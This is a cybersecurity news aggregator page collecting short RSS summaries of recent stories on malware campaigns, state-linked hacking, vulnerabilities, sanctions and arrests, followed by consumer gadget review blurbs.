'
Welcome to our cybersecurity news aggregator! This website gathers news articles from over 60 sources, providing you with a comprehensive and up-to-date overview of the latest happenings in the world of cybersecurity.
We utilize RSS feeds to collect the news, ensuring a streamlined and efficient process. This enables you to stay informed and access a wide variety of perspectives and insights in one convenient location.
Dive into the latest cybersecurity stories and explore the wealth of knowledge available, all in one place.
A new malware campaign is distributing a novel Rust-based information stealer dubbed EDDIESTEALER using the popular ClickFix social engineering tactic initiated via fake CAPTCHA verification pages. "This campaign leverages deceptive CAPTCHA verification pages that trick users into executing a malicious PowerShell script, which ultimately deploys the infostealer, harvesting sensitive data such as
Read MoreThe China-linked threat actor behind the recent in-the-wild exploitation of a critical security flaw in SAP NetWeaver has been attributed to a broader set of attacks targeting organizations in Brazil, India, and Southeast Asia since 2023. "The threat actor mainly targets the SQL injection vulnerabilities discovered on web applications to access the SQL servers of targeted organizations," Trend
Read MoreBreaking Out of the Security Mosh Pit When Jason Elrod, CISO of MultiCare Health System, describes legacy healthcare IT environments, he doesn't mince words: "Healthcare loves to walk backwards into the future. And this is how we got here, because there are a lot of things that we could have prepared for that we didn't, because we were so concentrated on where we were." This chaotic approach has
Read MoreThe U.S. Department of Treasury's Office of Foreign Assets Control (OFAC) has levied sanctions against a Philippines-based company named Funnull Technology Inc. and its administrator Liu Lizhi for providing infrastructure to conduct romance baiting scams that led to massive cryptocurrency losses. The Treasury accused the Taguig-headquartered company of enabling thousands of websites involved in
Read MoreConnectWise, the developer of remote access and support software ScreenConnect, has disclosed that it was the victim of a cyber attack that it said was likely perpetrated by a nation-state threat actor. "ConnectWise recently learned of suspicious activity within our environment that we believe was tied to a sophisticated nation-state actor, which affected a very small number of ScreenConnect
Read MoreMeta on Thursday revealed that it disrupted three covert influence operations originating from Iran, China, and Romania during the first quarter of 2025. "We detected and removed these campaigns before they were able to build authentic audiences on our apps," the social media giant said in its quarterly Adversarial Threat Report. This included a network of 658 accounts on Facebook, 14 Pages, and
Read MoreFake installers for popular artificial intelligence (AI) tools like OpenAI ChatGPT and InVideo AI are being used as lures to propagate various threats, such as the CyberLock and Lucky_Gh0$t ransomware families, and a new malware dubbed Numero. "CyberLock ransomware, developed using PowerShell, primarily focuses on encrypting specific files on the victim's system," Cisco Talos researcher Chetan
Read MoreCybersecurity researchers have taken the wraps off an unusual cyber attack that leveraged malware with corrupted DOS and PE headers, according to new findings from Fortinet. The DOS (Disk Operating System) and PE (Portable Executable) headers are essential parts of a Windows PE file, providing information about the executable. While the DOS header makes the executable file backward compatible
Read MoreThe threat actors behind the DragonForce ransomware gained access to an unnamed Managed Service Provider's (MSP) SimpleHelp remote monitoring and management (RMM) tool, and then leveraged it to exfiltrate data and drop the locker on multiple endpoints. It's believed that the attackers exploited a trio of security flaws in SimpleHelp (CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726) that were
Read MoreGoogle on Wednesday disclosed that the Chinese state-sponsored threat actor known as APT41 leveraged a malware called TOUGHPROGRESS that uses Google Calendar for command-and-control (C2). The tech giant, which discovered the activity in late October 2024, said the malware was hosted on a compromised government website and was used to target multiple other government entities. "Misuse of cloud
Read MoreCybersecurity researchers have disclosed a critical unpatched security flaw impacting TI WooCommerce Wishlist plugin for WordPress that could be exploited by unauthenticated attackers to upload arbitrary files. TI WooCommerce Wishlist, which has over 100,000 active installations, is a tool to allow e-commerce site customers to save their favorite products for later and share the lists on social
Read MoreAn Iranian national has pleaded guilty in the U.S. over his involvement in an international ransomware and extortion scheme involving the Robbinhood ransomware. Sina Gholinejad (aka Sina Ghaaf), 37, and his co-conspirators are said to have breached the computer networks of various organizations in the United States and encrypted files with Robbinhood ransomware to demand Bitcoin ransom payments.
Read MoreThe Czech Republic on Wednesday formally accused a threat actor associated with the People's Republic of China (PRC) of targeting its Ministry of Foreign Affairs. In a public statement, the government said it identified China as the culprit behind a malicious campaign targeting one of the unclassified networks of the Czech Ministry of Foreign Affairs. The extent of the breach is presently not
Read MoreCybersecurity researchers have discovered a security flaw in Microsoft's OneDrive File Picker that, if successfully exploited, could allow websites to access a user's entire cloud storage content, as opposed to just the files selected for upload via the tool. "This stems from overly broad OAuth scopes and misleading consent screens that fail to clearly explain the extent of access being granted,
Read MoreEmbedded Linux-based Internet of Things (IoT) devices have become the target of a new botnet dubbed PumaBot. Written in Go, the botnet is designed to conduct brute-force attacks against SSH instances to expand in size and scale and deliver additional malware to the infected hosts. "Rather than scanning the internet, the malware retrieves a list of targets from a command-and-control (C2) server
Read MoreStealer malware no longer just steals passwords. In 2025, it steals live sessions—and attackers are moving faster and more efficiently than ever. While many associate account takeovers with personal services, the real threat is unfolding in the enterprise. Flare’s latest research, The Account and Session Takeover Economy, analyzed over 20 million stealer logs and tracked attacker activity across
Read MoreA financially motivated threat actor has been observed exploiting a recently disclosed remote code execution flaw affecting the Craft Content Management System (CMS) to deploy multiple payloads, including a cryptocurrency miner, a loader dubbed Mimo Loader, and residential proxyware. The vulnerability in question is CVE-2025-32432, a maximum severity flaw in Craft CMS that was patched in
Read MoreWould you expect an end user to log on to a cybercriminal’s computer, open their browser, and type in their usernames and passwords? Hopefully not! But that’s essentially what happens if they fall victim to a Browser-in-the-Middle (BitM) attack. Like Man-in-the-Middle (MitM) attacks, BiTM sees criminals look to control the data flow between the victim’s computer and the target service, as
Read MoreCybersecurity researchers have disclosed details of a coordinated cloud-based scanning activity that targeted 75 distinct "exposure points" earlier this month. The activity, observed by GreyNoise on May 8, 2025, involved as many as 251 malicious IP addresses that are all geolocated to Japan and hosted by Amazon. "These IPs triggered 75 distinct behaviors, including CVE exploits,
Read MoreApple on Tuesday revealed that it prevented over $9 billion in fraudulent transactions in the last five years, including more than $2 billion in 2024 alone. The company said the App Store is confronted by a wide range of threats that seek to defraud users in various ways, ranging from "deceptive apps designed to steal personal information to fraudulent payment schemes that attempt to exploit
Read MoreMisconfigured Docker API instances have become the target of a new malware campaign that transforms them into a cryptocurrency mining botnet. The attacks, designed to mine for Dero currency, is notable for its worm-like capabilities to propagate the malware to other exposed Docker instances and rope them into an ever-growing horde of mining bots. Kaspersky said it observed an unidentified threat
Read MoreCybersecurity researchers have disclosed a new malicious campaign that uses a fake website advertising antivirus software from Bitdefender to dupe victims into downloading a remote access trojan called Venom RAT. The campaign indicates a "clear intent to target individuals for financial gain by compromising their credentials, crypto wallets, and potentially selling access to their systems," the
Read MoreMicrosoft has shed light on a previously undocumented cluster of malicious activity originating from a Russia-affiliated threat actor dubbed Void Blizzard (aka Laundry Bear) that it said is attributed to "worldwide cloud abuse." Active since at least April 2024, the hacking group is linked to espionage operations mainly targeting organizations that are important to Russian government objectives,
Read MoreArtificial intelligence is driving a massive shift in enterprise productivity, from GitHub Copilot’s code completions to chatbots that mine internal knowledge bases for instant answers. Each new agent must authenticate to other services, quietly swelling the population of non‑human identities (NHIs) across corporate clouds. That population is already overwhelming the enterprise: many companies
Read MoreThreat hunters have exposed a novel campaign that makes use of search engine optimization (SEO) poisoning techniques to target employee mobile devices and facilitate payroll fraud. The activity, first detected by ReliaQuest in May 2025 targeting an unnamed customer in the manufacturing sector, is characterized by the use of fake login pages to access the employee payroll portal and redirect
Read MoreThe U.S. Federal Bureau of Investigation (FBI) has warned of social engineering attacks mounted by a criminal extortion actor known as Luna Moth targeting law firms over the past two years. The campaign leverages "information technology (IT) themed social engineering calls, and callback phishing emails, to gain remote access to systems or devices and steal sensitive data to extort the victims,"
Read MoreThe Russia-aligned threat actor known as TAG-110 has been observed conducting a spear-phishing campaign targeting Tajikistan using macro-enabled Word templates as an initial payload. The attack chain is a departure from the threat actor's previously documented use of an HTML Application (.HTA) loader dubbed HATVIBE, Recorded Future's Insikt Group said in an analysis. "Given TAG-110's historical
Read MoreAs many as 60 malicious npm packages have been discovered in the package registry with malicious functionality to harvest hostnames, IP addresses, DNS servers, and user directories to a Discord-controlled endpoint. The packages, published under three different accounts, come with an install‑time script that's triggered during npm install, Socket security researcher Kirill Boychenko said in a
Read MoreAre your web privacy controls protecting your users, or just a box-ticking exercise? This CISO’s guide provides a practical roadmap for continuous web privacy validation that’s aligned with real-world practices. – Download the full guide here. Web Privacy: From Legal Requirement to Business Essential As regulators ramp up enforcement and users grow more privacy-aware, CISOs face a mounting
Read MoreCyber threats don't show up one at a time anymore. They’re layered, planned, and often stay hidden until it’s too late. For cybersecurity teams, the key isn’t just reacting to alerts—it’s spotting early signs of trouble before they become real threats. This update is designed to deliver clear, accurate insights based on real patterns and changes we can verify. With today’s complex systems, we
Read MoreCybersecurity researchers have disclosed a malware campaign that uses fake software installers masquerading as popular tools like LetsVPN and QQ Browser to deliver the Winos 4.0 framework. The campaign, first detected by Rapid7 in February 2025, involves the use of a multi-stage, memory-resident loader called Catena. "Catena uses embedded shellcode and configuration switching logic to stage
Read MoreThe malware known as Latrodectus has become the latest to embrace the widely-used social engineering technique called ClickFix as a distribution vector. "The ClickFix technique is particularly risky because it allows the malware to execute in memory rather than being written to disk," Expel said in a report shared with The Hacker News. "This removes many opportunities for browsers or security
Read MoreCybersecurity researchers have disclosed that a threat actor codenamed ViciousTrap has compromised nearly 5,300 unique network edge devices across 84 countries and turned them into a honeypot-like network. The threat actor has been observed exploiting a critical security flaw impacting Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers (CVE-2023-20118) to corral them into
Read MoreAs part of the latest "season" of Operation Endgame, a coalition of law enforcement agencies have taken down about 300 servers worldwide, neutralized 650 domains, and issued arrest warrants against 20 targets. Operation Endgame, first launched in May 2024, is an ongoing law enforcement operation targeting services and infrastructures assisting in or directly providing initial or consolidating
Read MoreFrom zero-day exploits to large-scale bot attacks — the demand for a powerful, self-hosted, and user-friendly web application security solution has never been greater. SafeLine is currently the most starred open-source Web Application Firewall (WAF) on GitHub, with over 16.4K stars and a rapidly growing global user base. This walkthrough covers what SafeLine is, how it works, and why it’s
Read MoreThe U.S. Department of Justice (DoJ) on Thursday announced the disruption of the online infrastructure associated with DanaBot (aka DanaTools) and unsealed charges against 16 individuals for their alleged involvement in the development and deployment of the malware, which it said was controlled by a Russia-based cybercrime organization. The malware, the DoJ said, infected more than 300,000
Read MoreThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday revealed that Commvault is monitoring cyber threat activity targeting applications hosted in their Microsoft Azure cloud environment. "Threat actors may have accessed client secrets for Commvault's (Metallic) Microsoft 365 (M365) backup software-as-a-service (SaaS) solution, hosted in Azure," the agency said. "This
Read MoreCybersecurity researchers have discovered an indirect prompt injection flaw in GitLab's artificial intelligence (AI) assistant Duo that could have allowed attackers to steal source code and inject untrusted HTML into its responses, which could then be used to direct victims to malicious websites. GitLab Duo is an artificial intelligence (AI)-powered coding assistant that enables users to write,
Read MoreA Chinese-speaking threat actor tracked as UAT-6382 has been linked to the exploitation of a now-patched remote-code-execution vulnerability in Trimble Cityworks to deliver Cobalt Strike and VShell. "UAT-6382 successfully exploited CVE-2025-0944, conducted reconnaissance, and rapidly deployed a variety of web shells and custom-made malware to maintain long-term access," Cisco Talos researchers
Read MoreA privilege escalation flaw has been demonstrated in Windows Server 2025 that makes it possible for attackers to compromise any user in Active Directory (AD). "The attack exploits the delegated Managed Service Account (dMSA) feature that was introduced in Windows Server 2025, works with the default configuration, and is trivial to implement," Akamai security researcher Yuval Gordon said in a
Read MoreA recently patched pair of security flaws affecting Ivanti Endpoint Manager Mobile (EPMM) software has been exploited by a China-nexus threat actor to target a wide range of sectors across Europe, North America, and the Asia-Pacific region. The vulnerabilities, tracked as CVE-2025-4427 (CVSS score: 5.3) and CVE-2025-4428 (CVSS score: 7.2), could be chained to execute arbitrary code on a
Read MoreIt’s not enough to be secure. In today’s legal climate, you need to prove it. Whether you’re protecting a small company or managing compliance across a global enterprise, one thing is clear: cybersecurity can no longer be left to guesswork, vague frameworks, or best-effort intentions. Regulators and courts are now holding organizations accountable for how “reasonable” their security programs are
Read MoreFor many organizations, identity security appears to be under control. On paper, everything checks out. But new research from Cerby, based on insights from over 500 IT and security leaders, reveals a different reality: too much still depends on people—not systems—to function. In fact, fewer than 4% of security teams have fully automated their core identity workflows. Core workflows, like
Read MoreCybersecurity researchers have uncovered multiple critical security vulnerabilities impacting the Versa Concerto network security and SD-WAN orchestration platform that could be exploited to take control of susceptible instances. It's worth noting that the identified shortcomings remain unpatched despite responsible disclosure on February 13, 2025, prompting a public release of the issues
Read MoreA sprawling operation undertaken by global law enforcement agencies and a consortium of private sector firms has disrupted the online infrastructure associated with a commodity information stealer known as Lumma (aka LummaC or LummaC2), seizing 2,300 domains that acted as the command-and-control (C2) backbone to commandeer infected Windows systems. "Malware like LummaC2 is deployed to steal
Read MoreRussian cyber threat actors have been attributed to a state-sponsored campaign targeting Western logistics entities and technology companies since 2022. The activity has been assessed to be orchestrated by APT28 (aka BlueDelta, Fancy Bear, or Forest Blizzard), which is linked to the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center, Military Unit 26165.
Read MoreRussian organizations have become the target of a phishing campaign that distributes malware called PureRAT, according to new findings from Kaspersky. "The campaign aimed at Russian business began back in March 2023, but in the first third of 2025 the number of attacks quadrupled compared to the same period in 2024," the cybersecurity vendor said. The attack chains, which have not been
Read MoreCounterfeit Facebook pages and sponsored ads on the social media platform are being employed to direct users to fake websites masquerading as Kling AI with the goal of tricking victims into downloading malware. Kling AI is an artificial intelligence (AI)-powered platform to synthesize images and videos from text and image prompts. Launched in June 2024, it's developed by Kuaishou Technology,
Read MoreContinuous Integration and Continuous Delivery/Deployment (CI/CD) refers to practices that automate how code is developed and released to different environments. CI/CD pipelines are fundamental in modern software development, ensuring code is consistently tested, built, and deployed quickly and efficiently. While CI/CD automation accelerates software delivery, it can also introduce security
Read MoreIt takes just one email to compromise an entire system. A single well-crafted message can bypass filters, trick employees, and give attackers the access they need. Left undetected, these threats can lead to credential theft, unauthorized access, and even full-scale breaches. As phishing techniques become more evasive, they can no longer be reliably caught by automated solutions alone. Let’s take
Read MoreThe U.S. government today imposed economic sanctions on Funnull Technology Inc., a Philippines-based company that provides computer infrastructure for hundreds of thousands of websites involved in virtual currency investment scams, commonly known as “pig butchering." In January 2025, KrebsOnSecurity detailed how Funnull was being used as a content delivery network that catered to cybercriminals seeking to route their traffic through U.S.-based cloud providers.
Read MoreAuthorities in Pakistan have arrested 21 individuals accused of operating "Heartsender," a once popular spam and malware dissemination service that operated for more than a decade. The main clientele for HeartSender were organized crime groups that tried to trick victim companies into making payments to a third party, and its alleged proprietors were publicly identified by KrebsOnSecurity in 2021 after they inadvertently infected their computers with malware.
Read MoreThe U.S. government today unsealed criminal charges against 16 individuals accused of operating and selling DanaBot, a prolific strain of information-stealing malware that has been sold on Russian cybercrime forums since 2018. The FBI says a newer version of DanaBot was used for espionage, and that many of the defendants exposed their real-life identities after accidentally infecting their own systems with the malware.
Read MoreKrebsOnSecurity last week was hit by a near record distributed denial-of-service (DDoS) attack that clocked in at more than 6.3 terabits of data per second (a terabit is one trillion bits of data). The brief attack appears to have been a test run for a massive new Internet of Things (IoT) botnet capable of launching crippling digital assaults that few web destinations can withstand. Read on for more about the botnet, the attack, and the apparent creator of this global menace.
Read MoreIn what experts are calling a novel legal outcome, the 22-year-old former administrator of the cybercrime community Breachforums will forfeit nearly $700,000 to settle a civil lawsuit from a health insurance company whose customer data was posted for sale on the forum in 2023. Conor Brian Fitzpatrick, a.k.a. "Pompompurin," is slated for resentencing next month after pleading guilty to access device fraud and possession of child sexual abuse material (CSAM).
Read MoreMicrosoft on Tuesday released software updates to fix at least 70 vulnerabilities in Windows and related products, including five zero-day flaws that are already seeing active exploitation. Adding to the sense of urgency with this month's patch batch from Redmond are fixes for two other weaknesses that now have public proof-of-concept exploits available.
Read MoreA Texas firm recently charged with conspiring to distribute synthetic opioids in the United States is at the center of a vast network of companies in the U.S. and Pakistan whose employees are accused of using online ads to scam westerners seeking help with trademarks, book writing, mobile app development and logo designs, a new investigation reveals.
Read MoreA employee at Elon Musk's artificial intelligence company xAI leaked a private key on GitHub that for the past two months could have allowed anyone to query private xAI large language models (LLMs) which appear to have been custom made for working with internal data from Musk's companies, including SpaceX, Tesla and Twitter/X, KrebsOnSecurity has learned.
Read MoreA 23-year-old Scottish man thought to be a member of the prolific Scattered Spider cybercrime group was extradited last week from Spain to the United States, where he is facing charges of wire fraud, conspiracy and identity theft. U.S. prosecutors allege Tyler Robert Buchanan and co-conspirators hacked into dozens of companies in the United States and abroad, and that he personally controlled more than $26 million stolen from victims.
Read MoreA whistleblower at the National Labor Relations Board (NLRB) alleged last week that denizens of Elon Musk's Department of Government Efficiency (DOGE) siphoned gigabytes of data from the agency's sensitive case files in early March. The whistleblower said accounts created for DOGE at the NLRB downloaded three code repositories from GitHub. Further investigation into one of those code bundles shows it is remarkably similar to a program published in January 2025 by Marko Elez, a 25-year-old DOGE employee who has worked at a number of Musk's companies.
Read MoreThere’s a new cybersecurity awareness campaign: Take9. The idea is that people—you, me, everyone—should just pause for nine seconds and think more about the link they are planning to click on, the file they are planning to download, or whatever it is they are planning to share.
There’s a website—of course—and a video, well-produced and scary. But the campaign won’t do much to improve cybersecurity. The advice isn’t reasonable, it won’t make either individuals or nations appreciably safer, and it deflects blame from the real causes of our cyberspace insecurities...
Read MoreI hadn’t known that the NGC 1068 galaxy is nicknamed the “Squid Galaxy.” It is, and it’s spewing neutrinos without the usual accompanying gamma rays.
Read MoreThe only links are from The Daily Mail and The Mirror, but a marital affair was discovered because the cheater was recorded using his smart toothbrush at home when he was supposed to be at work.
Read MoreRussia is proposing a rule that all foreigners in Moscow install a tracking app on their phones.
Using a mobile application that all foreigners will have to install on their smartphones, the Russian state will receive the following information:
- Residence location
- Fingerprint
- Face photograph
- Real-time geo-location monitoring
This isn’t the first time we’ve seen this. Qatar did it in 2022 around the World Cup:
Read More“After accepting the terms of these apps, moderators will have complete control of users’ devices,” he continued. “All personal content, the ability to edit it, share it, extract it as well as data from other apps on your device is in their hands. Moderators will even have the power to unlock users’ devices remotely.” ...
One one my biggest worries about VPNs is the amount of trust users need to place in them, and how opaque most of them are about who owns them and what sorts of data they retain.
A new study found that many commercials VPNS are (often surreptitiously) owned by Chinese companies.
Read MoreIt would be hard for U.S. users to avoid the Chinese VPNs. The ownership of many appeared deliberately opaque, with several concealing their structure behind layers of offshore shell companies. TTP was able to determine the Chinese ownership of the 20 VPN apps being offered to Apple’s U.S. users by piecing together corporate documents from around the world. None of those apps clearly disclosed their Chinese ownership...
Interesting story:
USS Stein was underway when her anti-submarine sonar gear suddenly stopped working. On returning to port and putting the ship in a drydock, engineers observed many deep scratches in the sonar dome’s rubber “NOFOUL” coating. In some areas, the coating was described as being shredded, with rips up to four feet long. Large claws were left embedded at the bottom of most of the scratches.
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
Read MoreTechnology and innovation have transformed every part of society, including our electoral experiences. Campaigns are spending and doing more than at any other time in history. Ever-growing war chests fuel billions of voter contacts every cycle. Campaigns now have better ways of scaling outreach methods and offer volunteers and donors more efficient ways to contribute time and money. Campaign staff have adapted to vast changes in media and social media landscapes, and use data analytics to forecast voter turnout and behavior.
Yet despite these unprecedented investments in mobilizing voters, overall trust in electoral health, democratic institutions, voter satisfaction, and electoral engagement has significantly declined. What might we be missing?...
Read MoreI already knew about the declining response rate for polls and surveys. The percentage of AI bots that respond to surveys is also increasing.
Solutions are hard:
Read More1. Make surveys less boring.
We need to move past bland, grid-filled surveys and start designing experiences people actually want to complete. That means mobile-first layouts, shorter runtimes, and maybe even a dash of storytelling. TikTok or dating app style surveys wouldn’t be a bad idea or is that just me being too much Gen Z?2. Bot detection.
There’s a growing toolkit of ways to spot AI-generated responses—using things like response entropy, writing style patterns or even metadata like keystroke timing. Platforms should start integrating these detection tools more widely. Ideally, you introduce an element that only humans can do, e.g., you have to pick up your price somewhere in-person. Btw, note that these bots can easily be designed to find ways around the most common detection tactics such as Captcha’s, timed responses and postcode and IP recognition. Believe me, way less code than you suspect is needed to do this...
A DoorDash driver stole over $2.5 million over several months:
Read MoreThe driver, Sayee Chaitainya Reddy Devagiri, placed expensive orders from a fraudulent customer account in the DoorDash app. Then, using DoorDash employee credentials, he manually assigned the orders to driver accounts he and the others involved had created. Devagiri would then mark the undelivered orders as complete and prompt DoorDash’s system to pay the driver accounts. Then he’d switch those same orders back to “in process” and do it all over again. Doing this “took less than five minutes, and was repeated hundreds of times for many of the orders,” writes the US Attorney’s Office...
Eufy features the cheapest robot vacuum combination this year, with a handheld unit built into the robot's body instead of the dock.
Read MoreI tested the best sleep headphones to find which whisked me away to sleep in minutes. These are the ones I recommend most.
Read MoreLenovo's ThinkPad T14s Gen 6 is a top-notch work laptop with a long-lasting battery and solid performance. For a limited time, multiple configurations are on sale.
Read MoreI tested the best robot vacuums for pet hair from iRobot, Roborock, and more to effortlessly keep your floors clean without the old upright vacuum.
Read MoreWe went hands-on with the best robot mowers that can cut your lawn regularly, so you can kick back and relax this spring.
Read MoreIf your next Disney+ binge can also score you a potential four-night Disney cruise or a host of other perks, streaming just got a lot more interesting.
Read MoreHere are the best laptop docking stations we've gone hands-on with to tidy up your workspace.
Read MoreNow in beta, the new feature allows you to pull up detailed information in a video without leaving the YouTube app.
Read MoreThe Onyx Boox Page delivers a rich feature set for an E Ink tablet, all housed within an equally noteworthy design.
Read MoreSamsung phones are brimming with useful features, but are you taking advantage of them?
Read MoreAt Red Hat Summit and Ansible Fest 2025, discussions included open source, automation, security, and, of course, AI - but in a refreshing way.
Read MoreStuck in a game on Xbox? Copilot is here to help.
Read MoreLog a 5K (or more!) on June 4 and unlock an exclusive badge.
Read MoreAmazon's Prime Day sale is back this July. Here's everything you need to know.
Read MoreHP's EliteBook Ultra G1i is impressively lightweight, reliably powerful, and built to last on battery life. But there's more to it.
Read MoreHere's a breakdown of several methods you can use to clear your Roku TV cache and boost performance in just minutes.
Read MoreForget tool kits and socks -- these top gadgets from smart wearables to thermometers will make the perfect gift for dad, no matter how tech-savvy he is (or isn't).
Read MoreEver wonder what your street looked like in the 1980s - or even the 30s? With Google Earth's historical imagery feature, you can view almost any location as it would've appeared throughout time.
Read MoreNeed an early Father's Day gift or just looking to expand your toolbox? The Home Depot is currently offering the 77-piece Milwaukee SAE/Metric combination wrench and socket set for 27% off.
Read MoreYes, you can be productive from the couch. This lap desk is packed with intentional features that make it great for gamers and workers alike.
Read MoreSecurity researchers flag two phishing campaigns abusing Firebase and Google Apps Script to host malware and fake login pages.
The post Firebase, Google Apps Script Abused in Fresh Phishing Campaigns appeared first on SecurityWeek.
Read MoreThe US Treasury Department US has slapped sanctions on Funnull Technology for providing support to cryptocurrency investment scams.
The post US Sanctions Philippine Company for Supporting Crypto Scams appeared first on SecurityWeek.
Read MoreJoin the live webinar to understand why data in itself is not enough to make informed decisions for prioritization.
The post Watch Now: Why Context is a Secret Weapon in Application Security Posture Management appeared first on SecurityWeek.
Read MoreChina-linked hackers used a compromised government site to target other government entities with the ToughProgress malware that uses an attacker-controlled Google Calendar for C&C.
The post Chinese Hacking Group APT41 Exploits Google Calendar to Target Governments appeared first on SecurityWeek.
Read MoreThe roadmap provides an overview of four key stages of the migration process, namely preparation, baseline understanding, planning and execution, and monitoring and evaluation.
The post MITRE Publishes Post-Quantum Cryptography Migration Roadmap appeared first on SecurityWeek.
Read MoreThe IT software provider says ScreenConnect users were impacted by the attack, which exploited a high-severity ASP.NET vulnerability.
The post ConnectWise Discloses Suspected State-Sponsored Hack appeared first on SecurityWeek.
Read MoreThe guidance outlines the benefits and challenges or SIEM and SOAR platforms, and shares implementation recommendations.
The post CISA Releases Guidance on SIEM and SOAR Implementation appeared first on SecurityWeek.
Read MoreActive since at least 2023, the hacking group has been targeting the financial, government, IT, logistics, retail, and education sectors.
The post Chinese Hacking Group ‘Earth Lamia’ Targets Multiple Industries appeared first on SecurityWeek.
Read MoreSecurity startup Unbound has raised $4 million in funding to help organizations adopt generative-AI tools securely and responsibly.
The post Unbound Raises $4 Million to Secure Gen-AI Adoption appeared first on SecurityWeek.
Read MoreProfessional hackers have built a network of ASUS routers that can survive firmware upgrades, factory reboots and most anti-malware scans.
The post GreyNoise Flags 9,000 ASUS Routers Backdoored Via Patched Vulnerability appeared first on SecurityWeek.
Read MoreConnectWise has brought in the big guns to investigate a "sophisticated nation state actor" that broke into its IT environment and then breached some of its customers.…
Read MoreA Defense Intelligence Agency (DIA) IT specialist is scheduled to appear in court today after being caught by the FBI trying to surreptitiously drop top secret information to a foreign government in a public park.…
Read MoreA Seattle cancer facility has agreed to fork out around $52.5 million as part of a class action settlement linked to a Thanksgiving 2023 cyberattack where criminals directly threatened cancer patients with swat attacks.…
Read MoreMeta has partnered with Anduril Industries to build augmented and virtual reality devices for the military, eight years after it fired the defense firm's founder, Palmer Luckey.…
Read MoreCriminals are using installers for fake AI software to distribute ransomware and other destructive malware.…
Read MoreThe UK’s data watchdog has reprimanded Greater Manchester Police (GMP) force for losing CCTV footage the cop shop was later requested to retain.…
Read MoreThe UK is spending more than £1 billion ($1.35 billion) setting up a new Cyber and Electromagnetic Command and is recruiting a few good men and women to join up and staff it.…
Read MorePartner content Infosecurity Europe celebrates its 30th anniversary by doubling down on its mission: Building a Safer Cyber World. Returning to ExCeL London from 3-5 June, the landmark edition of Europe's most influential cybersecurity event is set to be its most ambitious yet. With global cyberthreats mounting in scale and sophistication, the 2025 show will deliver strategic insight, practical training, and powerful connections across three days of expert content and community collaboration.…
Read MoreSecurity services vendor SentinelOne experienced a major outage on Thursday.…
Read MoreThe US Treasury has sanctioned a Philippine company and its administrator after linking them to the infrastructure behind the majority of so-called "pig butchering" scams reported to the FBI.…
Read MoreMicrosoft's latest Patch Tuesday update is failing to install on some Windows 11 machines, mostly virtual ones, and dumping them into recovery mode with a boot error. Its only recommendation to avoid the problem for now is to dodge the update.…
Read MoreChinese government spies burrowed deep into American telecommunications systems and critical infrastructure networks for one reason, according to retired US Army Lt. Gen. H.R. McMaster.…
Read MoreThousands of Asus routers are currently ensnared by a new botnet that is trying to disable Trend Micro security features before exploiting vulnerabilities for backdoor access.…
Read MoreA VPN vendor says billions of stolen cookies currently on sale either on dark web or Telegram-based marketplaces remain active and exploitable.…
Read MoreThe European Commission (EC) has kicked off a scheme to make Europe a better place to nurture global technology businesses, providing support throughout their lifecycle, from startup through to maturity.…
Read MoreUnderwear retailer Victoria's Secret’s website has been down for three days, with the company blaming an unspecified security problem.…
Read MoreSponsored Post From the use of ATMs to online banking, the financial services sector has always been at the forefront of technology. Now, it's leading the charge in AI. In their third annual survey of financial institutions the Bank of England and Financial Conduct Authority found 75% of companies already using AI with another 10% planning to do so over the next three years.…
Read MoreLexisNexis Risk Solutions (LNRS) is the latest big-name organization to disclose a serious cyberattack leading to data theft, with the number of affected individuals pegged at 364,333.…
Read MoreA Russian programmer will face the next 14 years in a "strict-regime" (high-security) penal colony after a regional court ruled he leaked sensitive data to Ukraine.…
Read MoreSponsored feature The IT business likes to reinvent things as quickly as possible. Except passwords, that is. We've been using them since Roman times, only now they're digital. They're the fungal skin disease of tech; irritating and hard to get rid of.…
Read MoreUpdated DragonForce ransomware infected a managed service provider, and its customers, after attackers exploited security flaws in remote monitoring and management tool SimpleHelp.…
Read MoreComputex Analysts rate Taiwan’s ASUS the world’s fifth most prolific PC-maker, but the company wants to climb the charts by targeting business buyers, according to Shawn Chang, Head of Go-To-Market for the outfit’s Commercial Business Unit.…
Read MoreA group of miscreants tracked as UNC6032 is exploiting interest in AI video generators by planting malicious ads on social media platforms to steal credentials, credit card details, and other sensitive info, according to Mandiant.…
Read MoreA previously unknown Kremlin-linked group has conducted cyber-espionage operations against Dutch police, NATO member states, Western tech companies, and other organizations of interest to the Russian government since at least April 2024, according to Dutch intelligence services and Microsoft.…
Read MoreAdidas is warning customers some of their data was stolen after an "unauthorized" person lifted it from a "third-party customer service provider."…
Read MoreSoftware biz MathWorks is cleaning up a ransomware attack more than a week after it took down MATLAB, its flagship product used by more than five million people worldwide.…
Read MoreInfosec In Brief Secrets of the Trump administration may have been exposed after a successful attack on messaging service TeleMessage, which has been used by some officials.…
Read MoreAsia In Brief China last week approved rules that will see Beijing issue identity numbers that netizens can use as part of a federated identity scheme that will mean they can use one logon across multiple online services.…
Read MoreINTERVIEW Uncle Sam's cybersecurity apparatus can't only focus on China and other nation-state actors, but also has to fight the much bigger damage from plain old cybercrime, says former White House advisor Michael Daniel. And the Trump administration's steep cuts to federal government staff are making that a lot harder.…
Read MoreObituary John Young, the co-founder of the legendary internet archive Cryptome, died at the age of 89 on March 28. The Register talked to friends and peers who gave tribute to a bright, pugnacious man who was devoted to the public's right to know.…
Read MoreNova Scotia Power on Friday confirmed it had been hit by a ransomware attack that began earlier this spring and disrupted certain IT systems, and admitted the crooks leaked data belonging to about 280,000 customers online. The stolen info may have included billing details and, for those on autopay, bank account numbers.…
Read MoreThe Cybersecurity and Infrastructure Security Agency (CISA) is warning that SaaS companies are under fire from criminals on the prowl for cloud apps with weak security.…
Read MoreA ruthless cyber conman who duped elderly pensioners – including an 80-year-old man – into smuggling deadly class A drugs was this week locked up.…
Read MoreThe US Department of Justice has unsealed indictments against 16 people accused of spreading and using the DanaBot remote-control malware that infected more than 300,000 computers, plus operating a botnet of the same name, and appears set to shutter its operations.…
Read MoreA suspected Chinese government spy group is behind the rash of attacks that exploit two Ivanti bugs that can be chained together to achieve unauthenticated remote code execution (RCE), according to analysts at threat intelligence outfit EclecticIQ.…
Read MoreThe FBI has filed an affidavit detailing how it identified a US Navy man who was allegedly distributing child sex abuse material (CSAM) through Discord.…
